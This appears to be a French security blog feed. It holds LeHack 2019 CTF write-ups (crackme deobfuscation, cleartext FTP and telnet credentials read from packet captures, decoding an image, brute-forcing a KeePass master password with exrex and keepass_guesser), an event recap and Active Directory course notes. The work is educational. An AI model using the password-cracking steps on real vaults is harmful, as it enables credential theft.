<span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="s1">'FfdkCtfr'</span><span class="p">[::</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s1">'f'</span><span class="p">,</span><span class="s1">'e'</span><span class="p">)</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="mi">4</span> <span class="o">*</span> <span class="mi">26</span> <span class="o">+</span> <span class="mi">3</span><span class="p">),</span> <span class="nb">chr</span><span class="p">(</span><span class="mi">0</span> <span class="o">*</span> <span class="mi">142</span> <span class="o">+</span> <span class="mi">111</span><span class="p">))</span> <span class="o">+</span> <span class="s1">'fzfqfQorTheWinjkildzodzp'</span><span class="p">[</span><span class="mi">6</span><span class="p">:</span><span class="mi">14</span><span class="p">]</span>
<span class="n">pass1</span> <span class="o">=</span> <span class="nb">input</span><span class="p">(</span><span class="s1">' :essap ed tom ertov rertne zelliuev'</span><span class="p">[::</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span>
<span class="k">if</span> <span class="n">pass1</span> <span class="o">==</span> <span class="n">flag</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Bien joue, tu as trouve le flag!'</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="nb">print</span> <span class="p">(</span><span class="s1">'Loupe... essaye encore!'</span><span class="p">)</span>
</code></pre></div>
<p>On comprend que le flag est défini par un série d'opération sur des caractères. Le plus simple est alors de simplement rajouter un <code>print(flag)</code> après qu'il soit défini en supprimant le test. Par exemple :</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python3</span>
<span class="n">flag</span> <span class="o">=</span> <span class="s1">'repuS'</span><span class="p">[::(</span><span class="o">-</span><span class="mi">1</span> <span class="o">*</span> <span class="mi">88</span> <span class="o">+</span> <span class="mi">87</span> <span class="o">*</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">183</span> <span class="o">+</span> <span class="mi">80</span> <span class="o">+</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">125</span> <span class="o">+</span> <span class="mi">7</span><span class="p">)]</span> <span class="o">+</span> <span class="nb">chr</span><span class="p">(</span><span class="mi">0</span> <span class="o">*</span> <span class="mi">161</span> <span class="o">+</span> <span class="mi">1</span> <span class="o">*</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">140</span> <span class="o">+</span> <span class="mi">76</span> <span class="o">+</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">72</span> <span class="o">+</span> <span class="mi">7</span><span class="p">)</span> <span class="o">+</span> <span class="nb">chr</span><span class="p">(</span><span class="o">-</span><span class="mi">26</span> <span class="o">+</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">53</span> <span class="o">+</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">5</span> <span class="o">*</span> <span class="mi">44</span> <span class="o">+</span> <span class="mi">26</span> <span class="o">+</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">141</span> <span class="o">+</span> <span class="mi">101</span><span class="p">)</span> <span class="o">+</span> <span class="nb">chr</span><span class="p">(</span><span class="mi">0</span> <span class="o">*</span> <span class="mi">153</span> <span class="o">+</span> <span class="mi">14</span> <span class="o">*</span> <span class="mi">0</span> <span class="o">*</span> <span class="mi">152</span> <span class="o">+</span> <span class="mi">4</span> <span class="o">+</span> <span class="mi">1</span> <span class="o">*</span> <span class="mi">94</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="s1">'FfdkCtfr'</span><span class="p">[::</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s1">'f'</span><span class="p">,</span><span class="s1">'e'</span><span class="p">)</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="mi">4</span> <span class="o">*</span> <span class="mi">26</span> <span class="o">+</span> <span class="mi">3</span><span class="p">),</span> <span class="nb">chr</span><span class="p">(</span><span class="mi">0</span> <span class="o">*</span> <span class="mi">142</span> <span class="o">+</span> <span class="mi">111</span><span class="p">))</span> <span class="o">+</span> <span class="s1">'fzfqfQorTheWinjkildzodzp'</span><span class="p">[</span><span class="mi">6</span><span class="p">:</span><span class="mi">14</span><span class="p">]</span>
<span class="nb">print</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span>
</code></pre></div>
<p>Le flag s'affiche alors et on peut valider le chall : <code>SuperSecretCodeForTheWin</code>.</p>LeHack 19 - my first network analysis2019-07-07T00:00:00+02:002019-07-07T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-07-07:/lehack-19-my-first-network-analysis.html<p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/ftp.pcapng">ftp.pcapng</a></em></p>
<div class="highlight"><pre><span></span><code>my first network analysis
5 Points
trouvez le mot de passe de l'utilisateur dans la capture suivante!
Url: https://static.wargame.rocks/ftp.pcapng
</code></pre></div>
<p>Le nom du fichier nous indique déjà une bonne piste sur ce qui nous attends. On ouvre donc notre capture réseau avec …</p><p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/ftp.pcapng">ftp.pcapng</a></em></p>
<div class="highlight"><pre><span></span><code>my first network analysis
5 Points
trouvez le mot de passe de l'utilisateur dans la capture suivante!
Url: https://static.wargame.rocks/ftp.pcapng
</code></pre></div>
<p>Le nom du fichier nous indique déjà une bonne piste sur ce qui nous attends. On ouvre donc notre capture réseau avec Wireshark :</p>
<p><img alt="wireshark" src="https://blog.nlegall.fr/images/lehack_ftp.png"></p>
<p>On voit directement le mot de passe en clair (ligne en surbrillance). Notre flag est donc : <code>HuHuFTPnosecure</code>.</p>
<p>Ce challenge nos rappel comme pour WorldGolfChampion, que certains protocoles ne chiffrent pas les échanges entre le serveur et le(s) client(s). Il est alors indispensable de changer pour du SFTP ou FTPS (FTP avec SSL/TLS) afin de rendre l'interception de ces données par un tiers.</p>LeHack 19 - Tipiak2019-07-07T00:00:00+02:002019-07-07T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-07-07:/lehack-19-tipiak.html<p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/tipiak.png">tipiak.png</a></em></p>
<div class="highlight"><pre><span></span><code>Tipiak
50 Points
Tipiak
Url: https://static.wargame.rocks/tipiak.png
</code></pre></div>
<p>Nous avons donc une image à analyser. On remarque facilement que la visière présente une grille de pixels quelque peu étrange.</p>
<p>Aucun script ou logiciel n'ayant été fonctionnel, la méthode manuelle fut requise. Il s'agit alors …</p><p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/tipiak.png">tipiak.png</a></em></p>
<div class="highlight"><pre><span></span><code>Tipiak
50 Points
Tipiak
Url: https://static.wargame.rocks/tipiak.png
</code></pre></div>
<p>Nous avons donc une image à analyser. On remarque facilement que la visière présente une grille de pixels quelque peu étrange.</p>
<p>Aucun script ou logiciel n'ayant été fonctionnel, la méthode manuelle fut requise. Il s'agit alors de découper les pixels afin de faciliter le repérage et de reporter : rouge pour <code>1</code> et jaune pour <code>0</code>.</p>
<p>On peut s'aider de GIMP pour afficher une grille permettant de séparer chaque pixel.</p>
<p><img alt="tipiak" src="https://blog.nlegall.fr/images/lehack_tipiak.png"></p>
<p>Cela nous donne alors la suite binaire suivante :</p>
<div class="highlight"><pre><span></span><code>100111101001011110010
0001000011011011111100100101001111010001
011100110101000011010000110100001101101111111011
1101101111110010111100110101000110110011010110111
1110001000100111101000101111011111100001101001101
01101111110001000100111101001000110001011110111111
10111101111010110001011110011001001011111011111100
1100110010011110010111001100010000101110111111001
011010000101110001011101111110010011100101111010
00001000110010001111100110101001110010001011100
111101001110010001010100100111001111010001101
1000110110001101100011011000110110001101100
011011000110110001101
</code></pre></div>
<p>On peut utiliser Python3 pour décoder tout ça :</p>
<div class="highlight"><pre><span></span><code><span class="o">>>></span> <span class="n">n</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="s1">'0b01100001011010000110111101111001001000000110110101100001011101000110010101111001011110010111100100100000001000010010000001101000011001010111001001100101001000000111011101100001011101000010000001111001011001010010000001110111011000010110111001110100001000000010000100001010011101000011001101101000001000000110011001101100001101000110011101111010001000000110100101111010001110100010000001101100011010000101111101110011011100000110010101100011011101000110000101100011011101010110110001100001011100100111001001110010011100100111001001110010011100100111001001110010'</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span>
<span class="o">>>></span> <span class="n">n</span><span class="o">.</span><span class="n">to_bytes</span><span class="p">((</span><span class="n">n</span><span class="o">.</span><span class="n">bit_length</span><span class="p">()</span> <span class="o">+</span> <span class="mi">7</span><span class="p">)</span> <span class="o">//</span> <span class="mi">8</span><span class="p">,</span> <span class="s1">'big'</span><span class="p">)</span><span class="o">.</span><span class="n">decode</span><span class="p">()</span>
<span class="s1">'ahoy mateyyy ! here wat ye want !</span><span class="se">\n</span><span class="s1">t3h fl4gz iz: lh_spectacularrrrrrrrr'</span>
</code></pre></div>
<p>On obtiens alors notre flag : <code>lh_spectacularrrrrrrrr</code>.</p>LeHack 19 - WorldGolfChampion2019-07-07T00:00:00+02:002019-07-07T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-07-07:/lehack-19-worldgolfchampion.html<p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/WorldGolfChampion.pcap">WorldGolfChampion.pcap</a></em></p>
<div class="highlight"><pre><span></span><code>WorldGolfChampion
50 Points
Help me, i need this flag
Url: http://static.wargame.rocks/WorldGolfChampion.pcap
</code></pre></div>
<p>On ouvre la capture avec Wireshark. Afin de rendre l'ensemble plus lisible, on peut utiliser l'option pour suivre le flux TCP (<code>CTRL</code> + <code>ALT</code> + <code>MAJ</code> + <code>T</code>).</p>
<p>On peut alors lire le trafic …</p><p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/WorldGolfChampion.pcap">WorldGolfChampion.pcap</a></em></p>
<div class="highlight"><pre><span></span><code>WorldGolfChampion
50 Points
Help me, i need this flag
Url: http://static.wargame.rocks/WorldGolfChampion.pcap
</code></pre></div>
<p>On ouvre la capture avec Wireshark. Afin de rendre l'ensemble plus lisible, on peut utiliser l'option pour suivre le flux TCP (<code>CTRL</code> + <code>ALT</code> + <code>MAJ</code> + <code>T</code>).</p>
<p>On peut alors lire le trafic telnet (qui est en clair).</p>
<p>On peut relever des informations intéressantes :</p>
<ul>
<li>username : tiger</li>
<li>mot de passe : woods1275</li>
<li>commandes utilisées : <code>keepass-cli</code>, <code>kpcli</code>, <code>base64 myecret.kdbx</code></li>
</ul>
<p>On comprends avec l’enchaînement des commandes : il a perdu son mot de passe maître sur son fichier KeePass. Afin de le récupérer en local, il a encodé son fichier afin d'avoir la même chose sur son poste. On peut donc faire de même et avoir le fichier :</p>
<div class="highlight"><pre><span></span><code>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
QtUzbXKNYw==
</code></pre></div>
<p>Les deux signes égaux en fin de chaîne confirme que c'est bien de la base64.</p>
<p>On le décode dans un fichier :</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> <span class="s1">'A9mimmf7S7UBAAMAA[...]QtUzbXKNYw=='</span> <span class="p">|</span> base64 -d > password.kdbx
</code></pre></div>
<p>Maintenant que l'on a le fichier, il faut trouver le mot de passe maître pour l'ouvrir. On voit que des tentatives avec des mots de passes similaires ont été faites : <code>woods1077</code> et <code>woods1282</code>. On peut donc se douter que le mot de passe doit être le mot <code>woods</code> suivi de 4 chiffres.</p>
<p>Plusieurs outils existent pour faire ça. On peut utiliser par exemple https://github.com/asciimoo/exrex :</p>
<div class="highlight"><pre><span></span><code>$ pip install exrex
$ exrex <span class="s1">'woods\d{4}'</span> > wordlist
</code></pre></div>
<p>Ayant maintenant notre dictionnaire, nous pouvons essayer ces mots de passes un par un sur le fichier. Idem, des outils sont possibles. <code>keepass_guesser</code> fait parti de ces outils :</p>
<div class="highlight"><pre><span></span><code>$ git clone https://github.com/csirac2/keepass_guesser
$ <span class="nb">cd</span> keepass_guesser
$ pip2 install -r requirements.txt
$ python2 keepass_guesser password.kdbx wordlist
SUCCESS after <span class="m">181</span> attempts:
woods0180
</code></pre></div>
<p>On peut donc ouvrir le KeePass et afficher le contenu. On peut y voir trois entrée :</p>
<p>On affiche le mot de passe de la première et on notre flag : <code>lh_{I1oVeG0lfAndSex..W4IT.MyWiFe}</code>.</p>
<p>ps : <code>hashcat</code> marche également pour faire du brute force sur des fichiers KeePass. Cependant, lors d'essais sur ce fichier, aucun résultat n'est apparu. Même en forçant le mot de passe dans le dictionnaire, <code>hashcat</code> ne trouvait pas de correspondance avec le hash généré depuis la base64 décodée.</p>LeHack2019-07-06T00:00:00+02:002019-07-06T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-07-06:/lehack.html<p><img alt="https://lehack.org/user/images/lehack19/lehack_logo_h.png" src="https://lehack.org/user/images/lehack19/lehack_logo_h.png"></p>
<p><a href="https://lehack.org">https://lehack.org</a></p>
<p>LeHack est un événement se déroulant tout les ans à Paris. Certains l'ont peut-être connu sous son ancien nom : <code>La nuit du hack</code>.</p>
<h2>Édition 2019</h2>
<p>Je me suis rendu à l'édition de l'année 2019 avec des collègues de la formation ESD. Des membres de Rennes, Nantes et …</p><p><img alt="https://lehack.org/user/images/lehack19/lehack_logo_h.png" src="https://lehack.org/user/images/lehack19/lehack_logo_h.png"></p>
<p><a href="https://lehack.org">https://lehack.org</a></p>
<p>LeHack est un événement se déroulant tout les ans à Paris. Certains l'ont peut-être connu sous son ancien nom : <code>La nuit du hack</code>.</p>
<h2>Édition 2019</h2>
<p>Je me suis rendu à l'édition de l'année 2019 avec des collègues de la formation ESD. Des membres de Rennes, Nantes et Paris ont été présents :). De plus, deux formateurs nous ont également accompagnés.</p>
<p>Nous avons fini 21ème au classement avec un total de 515 points. Des writes ups sont disponibles pour les challenges que nous avons validés. Pour les épreuves que nous avions pas validés, ils devraient arriver par la suite.</p>
<h3>Challenges</h3>
<ul>
<li><a href="https://blog.nlegall.fr/lehack-19-double-cesar.html">double césar</a></li>
<li><a href="https://blog.nlegall.fr/lehack-19-gladiator.html">gladiator</a></li>
<li><a href="https://blog.nlegall.fr/lehack-19-ecsc-stegcryptodiy-1.html">#ECSC StegCryptoDIY #1</a></li>
<li><a href="https://blog.nlegall.fr/lehack-19-hackhacklehack.html">HackHackLeHack</a></li>
<li><a href="https://blog.nlegall.fr/lehack-19-infiltrez-la-mafia.html">Infiltrez la mafia</a></li>
<li><a href="https://blog.nlegall.fr/lehack-19-my-first-crackme.html">my first crackme</a></li>
<li><a href="https://blog.nlegall.fr/lehack-19-my-first-network-analysis.html">my first network analysis</a></li>
<li><a href="https://blog.nlegall.fr/lehack-19-tipiak.html">Tipiak</a></li>
<li><a href="https://blog.nlegall.fr/lehack-19-worldgolfchampion.html">World Golf Champion</a></li>
<li><a href="https://blog.nlegall.fr/lehack-19-alphajet.html">alphajet</a></li>
<li><a href="https://blog.nlegall.fr/lehack-19-ecsc-amok.html">#ECSC Amok</a></li>
</ul>
<h3>Équipe</h3>
<p>Nous formions l'équipe : <code>ESD ENI Et Sylvie Et Evelyne Et Non</code>. Nous étions tous de l'ENI cursus ESD Rennes - Nantes :</p>
<ul>
<li><a href="https://fr.linkedin.com/in/maxime-caradec-856347157">Maxime Caradec</a></li>
<li><a href="https://viperr.org/site/index.html">Penthium2</a></li>
<li><a href="https://fr.linkedin.com/in/marion-nourrisset">Cuiliere_a_soupe</a></li>
<li><a href="https://fr.linkedin.com/in/mathieu-leforestier">TheForester</a></li>
<li><a href="https://fr.linkedin.com/in/gaelrepillez">DADmin</a></li>
<li><a href="https://fr.linkedin.com/in/acools">Kokoy</a></li>
<li><a href="https://fr.linkedin.com/in/eric-alsabty">K3b4b</a></li>
<li><a href="https://fr.linkedin.com/in/lucas-gicquiaud-751281132">Lucas</a></li>
<li><a href="https://fr.linkedin.com/in/antoine-barrier">Antoine</a></li>
<li><a href="https://fr.linkedin.com/in/yanncara">Glyann</a></li>
<li>Yoan</li>
<li><a href="https://www.minch.info">Francois</a></li>
<li><a href="https://fr.linkedin.com/in/damecour">Jeremy</a></li>
<li><a href="https://www.root-me.org/zancrows">Zancrows (a cheval sur 2 équipes) Thank you pour tes hints</a></li>
<li><a href="https://k-lfa.info">K-lfa</a></li>
</ul>AD - Avancé2018-11-24T10:20:00+01:002018-11-24T10:20:00+01:00nlegalltag:blog.nlegall.fr,2018-11-24:/ad-avance.html<p><img alt="" src="https://img.nlegall.fr/WdEkNxXJ"> Gestion avancé des services d'annuaire Active Directory</p>
<p><em>LDAP : RFC 4511</em></p>
<h1>Structure de l'annuaire AD</h1>
<h2>Définition</h2>
<table>
<thead>
<tr>
<th>Terme</th>
<th>Définition</th>
</tr>
</thead>
<tbody>
<tr>
<td>Forêt</td>
<td>Regroupement de plusieurs domaines AD et possède un seul schéma. Conception logique et non physique.</td>
</tr>
<tr>
<td>Domaine</td>
<td>Entité administrative de l'AD au sein de laquelle certaines fonctionnalités et caractéristiques sont partagées. Héberge l'ensemble …</td></tr></tbody></table><p><img alt="" src="https://img.nlegall.fr/WdEkNxXJ"> Gestion avancé des services d'annuaire Active Directory</p>
<p><em>LDAP : RFC 4511</em></p>
<h1>Structure de l'annuaire AD</h1>
<h2>Définition</h2>
<table>
<thead>
<tr>
<th>Terme</th>
<th>Définition</th>
</tr>
</thead>
<tbody>
<tr>
<td>Forêt</td>
<td>Regroupement de plusieurs domaines AD et possède un seul schéma. Conception logique et non physique.</td>
</tr>
<tr>
<td>Domaine</td>
<td>Entité administrative de l'AD au sein de laquelle certaines fonctionnalités et caractéristiques sont partagées. Héberge l'ensemble des objets de l'AD.</td>
</tr>
<tr>
<td>Contrôleur</td>
<td>Serveur exécutant un OS sur lequel les services de domaine AD sont déployés et serveur promu contrôleur de domaine. Il garanti le fonctionnement du domaine AD.</td>
</tr>
<tr>
<td>Site</td>
<td>Objet de l'annuaire qui se trouvent dans la partition de configuration (<code>CN=Sites,CN=Configuration,DC=domain;DC=tld</code>). Facilite la localisation des services et gère le trafic de réplication.</td>
</tr>
<tr>
<td>Domaine racine de la forêt</td>
<td>Le premier domaine domaine installé dans une forêt et qui l'a créé.</td>
</tr>
<tr>
<td>Arborescence de domaine</td>
<td>Domaine de toutes les ramifications : espace de noms communs.</td>
</tr>
<tr>
<td>Relation d'approbation</td>
<td>Permet d'autoriser des utilisateurs issus d'un autre domaine ou forêt d'accéder à des ressources internes de l'entreprise. Exemple : jonction au domaine d'un poste.</td>
</tr>
<tr>
<td>Objet</td>
<td>Représente une entité logique unique ainsi que l'ensemble de ces attributs.</td>
</tr>
<tr>
<td>Attribut</td>
<td>Caractéristique d'un objet.</td>
</tr>
<tr>
<td>Classe</td>
<td>Type de l'objet : ordinateur, contact, groupe, OU, imprimante ou utilisateur et comprend l'ensemble des attributs propre à la classe.</td>
</tr>
<tr>
<td>Schéma</td>
<td>Définit le type d'objet qui peut être créer avec les attributs possible.</td>
</tr>
<tr>
<td>Base de données</td>
<td>Emplacement central où sont stocké les données. Représente un ensemble de champs.</td>
</tr>
<tr>
<td>Structure logique</td>
<td>Affichage présenté dans les consoles de gestions.</td>
</tr>
<tr>
<td>Partitions</td>
<td>Partition de domaine, de configuration et du schéma.</td>
</tr>
<tr>
<td>Structure physique</td>
<td>Disque dur contenant la base de données.</td>
</tr>
</tbody>
</table>
<h2>Structure Active Directory</h2>
<p><img alt="" src="https://img.nlegall.fr/k0veic0j"></p>
<p>Administrateur entreprise : tout les domaines présents dans l'entreprise. Il est seulement présent dans le domaine racine.
Administrateur domaine : seulement son domaine.</p>
<p>Les contrôleurs fonctionnent selon un mode dit multi-maîtres : chaque contrôleur dispose d'un réplica de la base AD et peut y lire et écrire.</p>
<p>L'AD dépend des services réseau pour son fonctionnement :</p>
<ul>
<li>DNS : sans lui, le domaine ne peut fonctionner. Pour permettre la communication avec le domaine et pour localiser des ressources (LDAP, Kerberos, CG...).</li>
</ul>
<p>Les rôles suivant reposent sur l'AD : Hyper-V, WDS, DFS, Exchange, SSCM...</p>
<h2>Objet</h2>
<p>Un annuaire est un regroupement d'entrées et d'enregistrements ou objets. Tout le contenu d'un annuaire est rassemblé au sein de ces objets.</p>
<p>OBJET -> CLASSE -> ATTRIBUT -> VALEUR</p>
<p>Attributs d'unicité :</p>
<ul>
<li>GUID : identifie de manière unique tout objet. Cet attribut est non modifiable durant toute la durée de vie de l'objet.</li>
<li>SID : identifiant de sécurité de l'objet, seules les entités de sécurité en disposent. Il est composé d'un identifiant du domaine d'appartenance de l'objet et d'un identifiant de l'objet au sein de son domaine.</li>
</ul>
<p>Dans le schéma sont référencés :</p>
<ul>
<li>l'ensemble des classes d'objets disponibles</li>
<li>Pour chaque classe, les attributs qui peuvent ou doivent être renseignés</li>
<li>la liste des attributs et leur caractéristiques</li>
</ul>
<p>Numéro de version : chaque objet de l'annuaire dispose d'un numéro de version (USN). Il est stocké sous forme de valeur de l'attribut uSNChanged. Chaque attribut dispose d'un numéro de séquence de l'attribut. Il permet de répliquer les modifications de l’attribut au près des autres contrôleurs.</p>
<h2>Organisation des données de l'annuaire</h2>
<p><img alt="" src="https://img.nlegall.fr/8zIMUkfH"></p>
<p>Les contrôleurs de domaine disposent d'une copie de la base AD et d'un point de partage de fichiers :</p>
<ul>
<li><code>C:\Windows\NTDS</code> pour la base AD</li>
<li><code>C:\Windows\SYSVOL</code> qui contient le partage SYSVOL</li>
</ul>
<table>
<thead>
<tr>
<th>Fichier</th>
<th>Correspondance</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ntds.dit</td>
<td>Fichier correspondant à la base AD</td>
</tr>
<tr>
<td>Edb.log</td>
<td>Fichier de journalisation des transactions en cours</td>
</tr>
<tr>
<td>Edb*.log</td>
<td>Fichier de journalisation supplémentaires</td>
</tr>
<tr>
<td>Edb.chk</td>
<td>Fichier de point de contrôle de la base de données</td>
</tr>
<tr>
<td>Edbress00001.jrs</td>
<td>Fichiers de réservation d'espace disque</td>
</tr>
<tr>
<td>Edbress00002.jrs</td>
<td>Fichiers de réservation d'espace disque</td>
</tr>
</tbody>
</table>
<blockquote>
<p>sauf procédure ciblée, éviter de manipuler directement ces fichiers. Leur manipulation se fait au moyen d'outils.</p>
</blockquote>
<p>La base de données AD est gérée par son moteur ESE (Extensible Storage Engine).</p>
<p>SCHEMA ESE</p>
<p>Le dossier SYSVOL est présent sur tout contrôleur de domaine. Il contient les dossiers policies (partie GPT des stratégies et les fichiers ADM pour toutes les stratégies de groupes) et scripts (ouverture de session des utilisateurs).</p>
<h2>Organisation logique des données</h2>
<p><img alt="" src="https://img.nlegall.fr/STDdFSXV"></p>
<table>
<thead>
<tr>
<th>Nom de la partition</th>
<th>Contenu</th>
<th>Étendu de la réplication</th>
</tr>
</thead>
<tbody>
<tr>
<td>Domaine</td>
<td>Contient les objets du domaine qui sont généralement gérés depuis la console utilisateurs et ordinateurs AD</td>
<td>Domaine</td>
</tr>
<tr>
<td>Configuration</td>
<td>Contient les informations de configuration des services de domaine</td>
<td>Forêt</td>
</tr>
<tr>
<td>Schéma</td>
<td>Contient le schéma de la base AD. Dans le schéma sont sont stockés les caractéristiques des classes et des attributs d'objets</td>
<td>Forêt</td>
</tr>
</tbody>
</table>
<h2>Catalogue global</h2>
<p><em>Chaque domaine doit contenir un catalogue global.</em></p>
<p>Il contient l'intégralité des objets de la forêt mais un nombre limité d'attributs est utilisé pour ces objets. Ces objets sont en lecture seule.</p>
<p>Cas d'utilisation : fonction de recherche d'objets dans la forêt, résolution UPN (User Principal Name), groupes universels, listes d'adresses globales (Exchange)</p>
<p>Utilité de l'ajout :</p>
<ul>
<li>Dans un contexte multi-domaines, faciliter la recherche d'objets hors domaine</li>
<li>Besoin fréquents, pour les applicatifs, d'attributs d'objets d'autres domaines</li>
</ul>
<p>Limite à l'ajout : impacte tous les serveurs de CG de la forêt (charge supplémentaire de réplication)</p>
<p>Contexte de domaine unique :</p>
<ul>
<li>Contexte mono-site : le placement devrait se faire sur tous les contrôleurs du domaine</li>
<li>Contexte multi-site : Si un contrôleur est présent sur un autre site avec une liaison lente, activer plutôt la mise en cache des groupes universels</li>
</ul>
<p>Contexte de domaines et sites multiples : un serveur de CG est nécessaire par site si :</p>
<ul>
<li>Une application nécessite un catalogue global</li>
<li>Le nombre d'utilisateurs est supérieur à 100</li>
<li>Une liaison lente raccorde un des sites et le CG</li>
<li>Des problèmes de performances sont constatés</li>
<li>Un nombre important d'utilisateurs utilise des profils itinérants</li>
</ul>
<h1>Installation et configuration des domaines AD</h1>
<h2>Définitions</h2>
<table>
<thead>
<tr>
<th>Terme</th>
<th>Définition</th>
</tr>
</thead>
<tbody>
<tr>
<td>Outils de configuration</td>
<td>RSAT, Server Manager, MMC, PowerShell</td>
</tr>
<tr>
<td>Niveaux fonctionnels</td>
<td>Fonctionnalités actives au sein d'un domaine ou d'une forêt. Défini également le système d'exploitation minimal pouvant héberger le rôle AD. Deux niveaux : forêt et domaine</td>
</tr>
<tr>
<td>Maîtres d'opération</td>
<td>Rôles FSMO : contrôleur de schéma, maître d'attribution de noms de domaine, maître RID, maître d'infrastructure et émulateur PDC</td>
</tr>
